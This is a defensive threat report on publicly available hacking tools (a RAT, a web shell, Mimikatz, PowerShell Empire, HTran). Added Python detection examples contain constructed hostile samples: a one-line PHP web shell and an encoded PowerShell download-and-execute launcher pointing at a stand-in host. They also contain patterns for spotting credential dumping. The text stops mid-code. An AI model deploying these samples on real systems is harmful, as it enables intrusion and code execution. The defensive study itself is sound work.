National Cyber Security Centre

Joint report on publicly available hacking tools
Limiting the effectiveness of tools commonly used by malicious actors

Contents

Introduction
  Nature of the tools
  Report structure
Remote access trojans: JBiFrost
  In use; Capabilities; Examples; Detection and protection
Web shells: China Chopper
  In use; Capabilities; Detection and protection
Credential stealers: Mimikatz
  In use; Capabilities; Examples; Detection and protection
Lateral movement frameworks: PowerShell Empire
  In use; Capabilities; Examples; Detection and protection
C2 obfuscation tools: HTran
  In use; Capabilities; Examples; Detection and protection
General detection and prevention measures

Introduction

This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the UK and USA.1 In it we highlight the use of five publicly-available tools which have been used for malicious purposes in recent cyber incidents around the world. To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.

Nature of the tools

The individual tools we cover in this report are limited examples of the types used by malicious actors. You should not consider it an exhaustive list when planning your network defence.

Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the Dark Web. Today, hacking tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organised criminals, through to amateur hackers.

These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution.

Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives.

Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Abuse of unpatched software vulnerabilities or poorly configured systems are common ways for an actor to gain access. The tools detailed here come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim's systems.

Report structure

The tools detailed fall into five categories: remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C2) obfuscators.

The report provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by hostile actors. Measures to aid detection and limit the effectiveness of each tool are also described. The report concludes with general advice for improving network defence practices.

1 The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC).

Remote access trojans: JBiFrost

First observed in May 2015, the JBiFrost remote access trojan (RAT) is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT from 2012.

A RAT is a programme which, once installed on a victim's machine, allows remote administrative control. In a malicious context it can, among many other functions, be used to install backdoors and key loggers, take screen shots, and exfiltrate data.

Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programmes and can mimic the behaviour of legitimate applications. To prevent forensic analysis, RATs have been known to disable security measures such as Task Manager and network analysis tools such as Wireshark on the victim's system.

In use

JBiFrost is typically employed by cyber criminals and low-skilled actors, but its capabilities could easily be adapted for use by state actors. Other RATs are widely used by Advanced Persistent Threat (APT) groups, such as Adwind against the aerospace and defence sector, or Quasar RAT by APT10 against a broad range of sectors.

Malicious actors have also compromised servers with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation or to steal valuable information such as banking credentials, Intellectual Property or PII.

Capabilities

The JBiFrost RAT is Java-based, cross-platform and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, Mac OS X and Android.

JBiFrost allows actors to pivot and move laterally across a network, or install additional malicious software. It is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service.

Past infections have exfiltrated intellectual property, banking credentials and Personally Identifiable Information (PII). Machines infected with JBiFrost can also be used in botnets to carry out Distributed Denial of Service (DDoS) attacks.

Examples

Since early 2018, we have observed an increase in JBiFrost being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT's hosting on infrastructure located in our countries.

In early 2017, the Adwind RAT was deployed via spoofed emails designed to look as if they originated from SWIFT network services.

Many other publicly available RATs, including variations of the Gh0st RAT, have also been observed in use against a range of victims worldwide.

Detection and protection

Some possible indications of a JBiFrost RAT infection can include, but are not limited to:

• inability to restart the computer in safe mode
• inability to open the Windows registry editor or task manager
• significant increase in disk activity and/or network traffic
• connection attempts to known malicious IP addresses
• creation of new files and directories with obfuscated or random names

Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organisation is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently.

Strict application whitelisting is recommended to prevent infections occurring.

The initial infection mechanism for RATs, including JBiFrost, can be via phishing emails. You can help prevent JBiFrost infections by stopping these phishing emails from reaching your users, helping users to identify and report phishing emails, and implementing security controls so that the malicious email doesn't compromise your devices. For further details see the NCSC's latest phishing guidance.2

2 https://www.ncsc.gov.uk/phishing

Web shells: China Chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor remote administrative capability. Once this access is established, web shells can also be used to pivot to further hosts within a network.

In use

The China Chopper web shell is extensively used by hostile actors to remotely access compromised web servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device.

As China Chopper is just 4 Kb in size, and has an easily modifiable payload, detection and mitigation are difficult for network defenders.

Capabilities

The China Chopper web shell has two main components: the China Chopper client, which is run by the attacker, and the China Chopper server, which is installed on the victim web server but is also attacker-controlled.

The web shell client can issue terminal commands and manage files on the victim server. Its MD5 hash is publicly available.3

Web shell client: caidao.exe
MD5 hash: 5001ef50c7e869253a7c152a638eab8a

The web shell server is uploaded in plain text and can easily be changed by the attacker. This makes it hard to define a specific hash that can identify adversary activity.

In summer 2018, threat actors were observed targeting public-facing web servers vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution.

China Chopper was intended as the second-stage payload, delivered once servers had been compromised, allowing the attacker remote access to the victim host.

After successful exploitation of a vulnerability on the victim machine, the text-based China Chopper is placed on the victim web server. Once uploaded, the web shell server can be accessed by the attacker at any time using the client application. Once successfully connected, the attacker proceeds to manipulate files and data on the web server.

Capabilities include uploading and downloading files to and from the victim, using the file retrieval tool 'wget' to download files from the internet to the target, and editing, deleting, copying, renaming, and even changing the timestamp of existing files.

3 Originally posted on hxxp://www.maicaidao.com

Detection and protection

The most powerful defence against a web shell is to avoid the web server being compromised in the first place. Ensure that all the software running on public-facing web servers is up to date, with security patches applied. Audit custom applications for common web vulnerabilities.4

One attribute of China Chopper is that every action generates an HTTP POST. This can be noisy and easily spotted if investigated by a network defender.

While the China Chopper web shell server upload is plain text, commands issued by the client are Base64 encoded, although this is easily decodable.

The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.

The most effective way to detect and mitigate China Chopper is on the host itself, specifically on public-facing web servers. There are simple ways to search for the presence of the web shell using the command line on both Linux and Windows based operating systems.5

To detect web shells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (for example, PHP binaries spawning processes), or out of pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed, or from modifying existing files.

We also recommend that you use web access logs as a source of monitoring, for example through traffic analytics. Observing new, unexpected pages, or changes in traffic patterns, can act as an early indicator.
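The host-side search and the web-log review described above, as an added example that is not the report's own code. It assumes the web root is supplied as a path-to-content mapping and that request parameters are available to the reviewer (a body-logging reverse proxy or WAF would supply them; plain access logs do not record POST bodies). Every file and request below is a constructed sample, and the eval pattern and size threshold are assumptions, not a complete signature:

```python
"""Added example (not the report's own code): host- and log-based checks for a
China Chopper style web shell. Assumes the web root is given as a
path -> content mapping and requests as dicts with method, path and params;
every file and request below is a constructed sample."""
import base64
import binascii
import re
from collections import defaultdict

# The server half of the shell is a few bytes that hand request input to an
# eval-like construct: PHP eval/assert over $_POST/$_GET/$_REQUEST, or the
# ASP/ASPX forms that evaluate Request(...) / Request.Item(...).
EVAL_PATTERN = re.compile(
    r"\b(?:eval|assert)\s*\([^;]{0,40}\$_(?:POST|GET|REQUEST)\b"
    r"|\b(?:eval|execute|executeglobal)\s*\(?\s*request\b",
    re.IGNORECASE)


def find_suspicious_scripts(files, max_size=4096):
    """Return sorted paths of small scripts that evaluate request input.
    max_size reflects the tiny footprint the section describes."""
    return sorted(path for path, content in files.items()
                  if len(content) <= max_size and EVAL_PATTERN.search(content))


B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def decode_if_base64(value):
    """Return the decoded text if value is Base64 wrapping printable text,
    else None. Client commands travel Base64-encoded in POST parameters, so
    decoding the parameter shows what the operator sent."""
    if not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def flag_post_activity(requests, baseline_paths):
    """Per path: new relative to a baseline crawl, driven only by POST, and any
    parameter that decodes from Base64. Every shell action is a POST, so a
    previously unseen POST-only page is the strongest of the three signals."""
    by_path = defaultdict(list)
    for req in requests:
        by_path[req["path"]].append(req)
    findings = []
    for path, reqs in sorted(by_path.items()):
        post_only = all(r["method"] == "POST" for r in reqs)
        new_page = path not in baseline_paths
        decoded = []
        for r in reqs:
            for key, value in r.get("params", {}).items():
                text = decode_if_base64(value)
                if text is not None:
                    decoded.append((key, text))
        if (new_page and post_only) or decoded:
            findings.append({"path": path, "new_page": new_page,
                             "post_only": post_only, "decoded": decoded})
    return findings


# Constructed web root: an ordinary page plus a three-line "cache" script that
# evaluates whatever arrives in a POST parameter.
CONSTRUCTED_WEB_ROOT = {
    "/var/www/html/index.php":
        "<?php\nrequire 'app/bootstrap.php';\necho render_home($_GET['page'] ?? 'home');\n",
    "/var/www/html/images/cache.php": "<?php\n@eval($_POST['pass']);\n?>\n",
}
# Constructed baseline (paths known from a crawl before the incident) and traffic.
BASELINE_PATHS = {"/index.php", "/login.php", "/api/orders"}
CONSTRUCTED_REQUESTS = [
    {"method": "GET", "path": "/index.php", "params": {"page": "home"}},
    {"method": "POST", "path": "/login.php",
     "params": {"user": "alice", "pass": "correct-horse-battery"}},
    {"method": "POST", "path": "/api/orders", "params": {"order": '{"id":42,"qty":1}'}},
    {"method": "POST", "path": "/images/cache.php",
     "params": {"z0": base64.b64encode(b"echo getcwd();").decode()}},
    {"method": "POST", "path": "/images/cache.php",
     "params": {"z0": base64.b64encode(b"print_r(scandir('.'));").decode()}},
]


def run_checks():
    """Run both checks over the constructed samples."""
    return (find_suspicious_scripts(CONSTRUCTED_WEB_ROOT),
            flag_post_activity(CONSTRUCTED_REQUESTS, BASELINE_PATHS))


if __name__ == "__main__":
    scripts, posts = run_checks()
    print("scripts evaluating request input:", scripts)
    for finding in posts:
        print(finding)
```

The Base64 check is a triage aid rather than a signature: legitimate applications also post Base64 parameters, so pair it with the new-page and POST-only signals and with the outbound-connection and process-spawn monitoring the section describes. Once the server is behind TLS, only the host-side search and the server's own logs still see any of this.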
4 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
5 A range of useful commands and signatures for tracking China Chopper can be found at www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

Credential stealers: Mimikatz

Developed in 2007, Mimikatz is mainly used by attackers to collect the credentials of other users logged in to a targeted Windows machine. It does this by accessing the credentials in memory, within a Windows process called Local Security Authority Subsystem Service (LSASS).

These credentials, either plain text or in hashed form, can be reused to give access to other machines on a network.

Although it was not originally intended as a hacking tool, in recent years Mimikatz has been used by multiple actors for malicious purposes. Its use in compromises around the world has prompted organisations globally to re-evaluate their network defences.

Mimikatz is typically used by malicious actors once access has been gained to a host and the actor wishes to move throughout the internal network. Its use can significantly undermine poorly configured network security.

In use

Mimikatz source code is publicly available, which means anyone can compile their own versions of the tool and potentially develop new custom plug-ins and additional functionality. Our cyber authorities have observed widespread use of Mimikatz among hostile actors, including organised crime and state-sponsored groups.

Once a malicious actor has gained local admin privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.

For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.

Capabilities

Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.

The tool can obtain LAN Manager and NTLM hashes, certificates, and long-term keys on Windows XP (2003) through to Windows 8.1 (2012 R2). In addition, it can perform pass-the-hash or pass-the-ticket tasks and build Kerberos Golden Tickets.

Many features of Mimikatz can be automated with scripts such as PowerShell, allowing an actor to rapidly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available yet powerful 'Invoke-Mimikatz' PowerShell script, Mimikatz activity is very difficult to isolate and identify.

Examples

Mimikatz has been used across multiple incidents by a broad range of actors for several years.

In 2011, it was used by unknown hackers to obtain administrator credentials from the Dutch certificate authority DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.

More recently, Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.

In addition, a Microsoft research team identified use of the tool during a sophisticated cyberattack targeting several high-profile technology and financial organisations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.

Detection and protection

Updating Windows will help reduce the information available to an actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.

To prevent Mimikatz credential retrieval, defenders should disable the storage of clear text passwords in LSASS memory. This is default behaviour for Windows 8.1, Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed.6

Windows 10 and Windows Server 2016 systems can be protected by using newer security features such as Credential Guard. Credential Guard will be enabled by default if:

• the hardware meets Microsoft's Windows Hardware Compatibility Programme Specifications and Policies for Windows Server 2016 and Windows Server Semi-Annual Branch
• the server is not acting as a Domain Controller

You should verify that your physical and virtualised servers meet Microsoft's minimum requirements for each release of Windows 10 and Windows Server.7

Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler. You should set user policies within your organisation which discourage password reuse, even across common level accounts on a network. The freely available Local Admin Password Solution (LAPS) from Microsoft can allow easy management of local admin passwords, preventing the need to set and store passwords manually.

6 https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a
7 https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements

Network administrators should monitor and respond to unusual or unauthorised account creation or authentication to prevent Golden Ticket exploitation or network persistence and lateral movement. For Windows, tools such as Microsoft ATA and Azure ATP can help with this.

Network administrators should ensure that systems are patched and up to date. Numerous Mimikatz features are mitigated or significantly restricted by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third-party modules are often developed.
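Two of the monitoring points just described, unusual authentication and privileged accounts logging on to machines they should not, as an added example that is not part of the report. It assumes logon events have been exported with the fields used below (the shape of a Windows 4624 logon event); all events are constructed, and the window, threshold and allowed-host set are assumptions to tune per environment:

```python
"""Added example (not from the report): two authentication-log heuristics for
pass-the-hash style lateral movement and for privileged credentials exposed on
ordinary hosts. Assumed event shape: a dict with time (ISO 8601), account,
src_host, dst_host, logon_type and auth_package, as found in event 4624."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_events(events):
    """Return events with parsed timestamps, oldest first."""
    return sorted(({**e, "time": datetime.fromisoformat(e["time"])} for e in events),
                  key=lambda e: e["time"])


def ntlm_fanout(events, window=timedelta(minutes=10), min_hosts=5):
    """Flag (account, src_host) pairs that open NTLM network logons (type 3) to
    at least min_hosts distinct hosts inside one sliding window. A hash replayed
    from a single foothold produces exactly this fan-out shape."""
    per_pair = defaultdict(list)
    for e in parse_events(events):
        if e["logon_type"] == 3 and e["auth_package"].upper() == "NTLM":
            per_pair[(e["account"], e["src_host"])].append(e)
    findings = []
    for (account, src), evs in per_pair.items():
        best = 0
        for i, start in enumerate(evs):
            hosts = {x["dst_host"] for x in evs[i:] if x["time"] - start["time"] <= window}
            best = max(best, len(hosts))
        if best >= min_hosts:
            findings.append((account, src, best))
    return sorted(findings)


def privileged_logons_off_tier(events, privileged, allowed_hosts):
    """Flag interactive (2), RDP (10) or cached-interactive (11) logons by
    privileged accounts onto hosts outside the allowed set (domain controllers
    and admin workstations). Credentials only reach LSASS on hosts the account
    actually logs on to, which is why the section says to keep them off
    ordinary machines."""
    return sorted({(e["account"], e["dst_host"], e["logon_type"])
                   for e in events
                   if e["account"] in privileged
                   and e["logon_type"] in (2, 10, 11)
                   and e["dst_host"] not in allowed_hosts})


def _ev(time, account, src, dst, logon_type, package):
    return {"time": time, "account": account, "src_host": src, "dst_host": dst,
            "logon_type": logon_type, "auth_package": package}


# Constructed sample: normal Kerberos use, a domain admin using RDP to a
# workstation, the same admin on the expected path, and a service account
# replaying NTLM to six servers in under a minute.
CONSTRUCTED_EVENTS = [
    _ev("2018-10-11T09:00:05", "j.smith", "WS-042", "FILE01", 3, "Kerberos"),
    _ev("2018-10-11T09:02:10", "j.smith", "WS-042", "PRINT01", 3, "Kerberos"),
    _ev("2018-10-11T09:01:00", "da_admin", "WS-042", "WS-042", 10, "Negotiate"),
    _ev("2018-10-11T09:05:00", "da_admin", "PAW-01", "DC01", 10, "Kerberos"),
] + [
    _ev(f"2018-10-11T09:10:{s:02d}", "svc_backup", "WS-017", f"SRV{n:02d}", 3, "NTLM")
    for n, s in enumerate(range(0, 60, 10), start=1)
]
PRIVILEGED = {"da_admin"}                      # assumed tier-0 account list
ALLOWED_ADMIN_HOSTS = {"DC01", "DC02", "PAW-01"}  # assumed DCs and admin workstations


def run_checks():
    """Run both heuristics over the constructed events."""
    return (ntlm_fanout(CONSTRUCTED_EVENTS),
            privileged_logons_off_tier(CONSTRUCTED_EVENTS, PRIVILEGED, ALLOWED_ADMIN_HOSTS))


if __name__ == "__main__":
    fanout, off_tier = run_checks()
    print("NTLM fan-out:", fanout)
    print("privileged logons off tier:", off_tier)
```

Both checks are deliberately coarse; vulnerability scanners and backup agents also fan out over NTLM, so an allow-list of known scanners belongs in front of the first one, and the second is only as good as the inventory of privileged accounts and admin hosts behind it.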
Most up-to-date antivirus tools will detect and isolate non-customised Mimikatz use, and should therefore be in use to detect these instances. But hostile actors can sometimes circumvent antivirus systems by running the tool in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates an actor actively present in the network rather than an automated process at work.

Several features of Mimikatz rely on exploitation of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply Privilege Access Management principles.

Since Mimikatz can only capture the accounts of those logged into a compromised machine, privileged users such as domain admins should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft.8

Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will aid identification of Mimikatz or pass-the-hash abuse, as well as providing some mitigation against attempts to bypass detection software.

8 https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory

Lateral movement frameworks: PowerShell Empire

PowerShell Empire is an example of a post-exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. Empire can also be used to generate malicious documents and executables for social engineering access to networks.

The PowerShell Empire framework (Empire) was designed as a legitimate penetration testing tool in 2015. Empire acts as a framework for continued exploitation once an attacker has gained access to a system.

The tool provides an attacker with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common, legitimate application (PowerShell) and can operate almost entirely in memory, Empire can be difficult to detect on a network using traditional antivirus tools.

In use

PowerShell Empire has become increasingly popular among hostile state actors and organised criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.

Initial exploitation methods vary between compromises, and actors can configure the Empire Framework uniquely for each scenario and target. This, in combination with the wide range of skill and intent within the Empire user community, means that ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by malicious actors.

Capabilities

Empire enables an attacker to carry out a range of actions on a victim's machine and implements the ability to run PowerShell scripts without needing 'powershell.exe' to be present on the system. Its communications are encrypted and its architecture flexible.

Empire uses 'modules' to perform more specific malicious actions. These provide attackers with a customisable range of options to pursue their goals on the victim's systems. These include escalation of privileges, credential harvesting, host enumeration, key-logging and the ability to move laterally across a network.

Empire's ease of use, flexible configuration and ability to evade detection make it a popular choice for actors of varying abilities.

Examples

During an incident in February 2018, a UK energy sector company was compromised by an unknown actor. This compromise was detected through Empire's beaconing activity using the tool's default profile settings. Weak credentials on one of the victim's administrator accounts are believed to have provided the actor with initial access to the network.

In early 2018, an unknown actor used Winter Olympics themed, socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations. This attack had an additional layer of sophistication, making use of Invoke-PSImage, a tool that will encode any PowerShell script into an image.

In December 2017, the hostile actor APT19 targeted a multinational law firm with a targeted phishing campaign. APT19 used obfuscated PowerShell macros embedded within Word documents generated by Empire.

Our cyber security authorities are also aware of Empire being used to target academia. In one reported instance, an actor attempted to use Empire to gain persistence using a Windows Management Instrumentation (WMI) event consumer. However, in this instance the Empire agent was unsuccessful in establishing network connections, due to the HTTP connections being blocked by a local security appliance.

Detection and protection

Identifying malicious PowerShell activity can be difficult, due to the prevalence of legitimate PowerShell on hosts and its increased use in maintaining a corporate environment.

To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.

Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell.

The Digital Shadows blog9 provides a good summary of PowerShell security practices.

The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.
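The logging advice above, together with the Mimikatz section's point about auditing PowerShell use and inspecting logs for anomalies, as an added example that is not part of the report. It assumes process creation auditing with command lines (event 4688) and script block logging (event 4104) are already on and that entries have been exported as text; the entries below are constructed, the launcher is encoded exactly the way PowerShell expects an -EncodedCommand (UTF-16LE, then Base64), and the indicator list is an assumption rather than a complete signature set:

```python
"""Added example (not from the report): triage of PowerShell command lines and
script block log entries. Assumed input: dicts with event_id (4688 process
creation with command line, 4104 script block) and a text field; entries are
constructed and 192.0.2.10 is a documentation address."""
import base64
import re

# Indicators drawn from the mitigations in this section: encoded launchers,
# hidden/no-profile invocation, in-memory download-and-execute, Base64 blobs
# inside scripts, Mimikatz-in-memory, and downgrades to PowerShell 2.
INDICATORS = [
    ("encoded_command", re.compile(
        r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_noprofile", re.compile(
        r"-(?:w|windowstyle)\s+hidden\b|-nop\b|-noprofile\b", re.I)),
    ("download_exec", re.compile(
        r"\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadData|WebRequest)\b"
        r"|\bDownloadString\b.*\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("base64_in_script", re.compile(r"FromBase64String", re.I)),
    ("mimikatz", re.compile(r"Invoke-Mimikatz|sekurlsa", re.I)),
    ("version_downgrade", re.compile(r"-(?:v|version)\s+2\b", re.I)),
]
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line):
    """Return the plain text behind an -EncodedCommand argument, or None.
    PowerShell wraps UTF-16LE text in Base64 here, which is why an ASCII decode
    of the same blob shows a null byte between every character."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(entries):
    """Score each entry against INDICATORS. Encoded commands are decoded and
    scanned as well, so a launcher is judged on what it would actually run."""
    results = []
    for entry in entries:
        texts = [entry["text"]]
        decoded = decode_encoded_command(entry["text"]) if entry["event_id"] == 4688 else None
        if decoded:
            texts.append(decoded)
        reasons = sorted({name for name, rx in INDICATORS for t in texts if rx.search(t)})
        results.append({"event_id": entry["event_id"], "reasons": reasons,
                        "decoded": decoded, "score": len(reasons)})
    return results


# Constructed samples: a scheduled script, an encoded hidden launcher, routine
# administration, a script block loading Mimikatz, and a version-2 downgrade.
LAUNCHER_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/index.asp')"
LAUNCHER_ENCODED = base64.b64encode(LAUNCHER_TEXT.encode("utf-16le")).decode()
CONSTRUCTED_ENTRIES = [
    {"event_id": 4688, "text": "powershell.exe -File C:\\scripts\\nightly-backup.ps1"},
    {"event_id": 4688, "text": f"powershell.exe -NoP -W Hidden -Enc {LAUNCHER_ENCODED}"},
    {"event_id": 4104, "text": "Get-ChildItem -Path C:\\Logs -Filter *.evtx | Measure-Object"},
    {"event_id": 4104, "text": "$m = [System.Convert]::FromBase64String($b); Invoke-Mimikatz -DumpCreds"},
    {"event_id": 4688, "text": "powershell.exe -Version 2 -Command Get-Process"},
]


def run_triage():
    """Triage the constructed entries."""
    return triage(CONSTRUCTED_ENTRIES)


if __name__ == "__main__":
    for result in run_triage():
        print(result["event_id"], result["score"], result["reasons"], result["decoded"] or "")
```

Script block logging matters here because the fourth entry would never appear on a command line: the Base64 blob is turned into code inside the process, and only the 4104 record shows the Invoke-Mimikatz call. The version-downgrade indicator is the log-side counterpart of the advice to remove old PowerShell versions; a host where version 2 has been removed simply fails that request.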
A combination of script code signing, application whitelisting and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also impact legitimate scripts, and it is strongly advised that they be thoroughly tested before deployment.

When organisations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.

9 https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/

C2 obfuscation tools: HTran

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools such as TOR, or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker's communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network.

In use

The use of HTran has been regularly observed in compromises of both government and industry targets.

A broad range of cyber actors have been observed using HTran and other connection proxy tools to:

• evade intrusion and detection systems on a network
• blend in with common traffic or leverage domain trust relationships to bypass security controls
• obfuscate or hide C2 infrastructure or communications
• create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure

Capabilities

HTran can run in several modes, each of which forwards traffic across a network by bridging two TCP sockets. They differ in terms of where the TCP sockets are initiated from, either locally or remotely. The three modes are:

• Server (listen) – both TCP sockets initiated remotely
• Client (slave) – both TCP sockets initiated locally
• Proxy (tran) – one TCP socket initiated remotely, the other initiated locally upon receipt of traffic from the first connection

HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.

Examples

Recent investigations by our cyber security authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments.

In one incident, the attacker compromised externally facing web servers running outdated and vulnerable web applications. This access enabled the upload of web shells, which were then used to deploy other tools, including HTran.

HTran was installed into the ProgramData directory, and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol (RDP) communications.

The actor issued a command to start HTran as a client, initiating a connection to a server located on the internet over port 80, which forwards RDP traffic from the local interface. In this case, HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet. Other well-known ports used included:

• port 53 – DNS
• port 443 – HTTP over TLS/SSL
• port 3306 – MySQL

By using HTran in this way, the actor was able to use RDP for several months without being detected.

Detection and protection

Attackers need access to a machine to install and run HTran, so network defenders should apply security patches and use good access control to prevent attackers installing malicious applications.
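Two network-side checks for this section, as an added example that is not part of the report: matching the clear-text connection-error message HTran relays when a destination becomes unavailable, and spotting an RDP connection request on a port where RDP is not expected, such as the ports listed above. It assumes TCP flows are available with their first payload bytes (from a sensor or a pcap); the flows, and the RDP opener used to build them, are constructed:

```python
"""Added example (not from the report): HTran-style relay detection over
constructed TCP flows. A flow is a dict with src, dst, dport and the first
payload bytes. The RDP signature is the X.224 Connection Request inside a TPKT
header, which is how every RDP session opens regardless of the port used."""
import re

# Error string quoted in this section; HTran relays it to the connecting client in the clear.
HTRAN_ERROR = re.compile(rb"\[SERVER\]connection to (?P<host>[^:\s]+):(?P<port>\d+) error\r\n")


def find_htran_error(payload):
    """Return (host, port) parsed from an HTran connection-error message, or None."""
    match = HTRAN_ERROR.search(payload)
    return (match.group("host").decode(), int(match.group("port"))) if match else None


def is_rdp_connection_request(payload):
    """True when payload is a TPKT record (version 3, reserved 0, big-endian
    total length) wrapping an X.224 Connection Request (code 0xE0)."""
    if len(payload) < 11 or payload[0] != 3 or payload[1] != 0:
        return False
    tpkt_len = int.from_bytes(payload[2:4], "big")
    return tpkt_len == len(payload) and payload[5] == 0xE0


EXPECTED_RDP_PORTS = {3389}   # assumption: where RDP is legitimately offered here


def scan_flows(flows):
    """Report flows carrying an HTran error, or opening RDP on a port where RDP
    is not expected (the section lists 80, 53, 443 and 3306 as ports seen in use)."""
    findings = []
    for flow in flows:
        err = find_htran_error(flow["payload"])
        if err:
            findings.append((flow["src"], flow["dst"], flow["dport"], "htran_error", err))
        elif (is_rdp_connection_request(flow["payload"])
              and flow["dport"] not in EXPECTED_RDP_PORTS):
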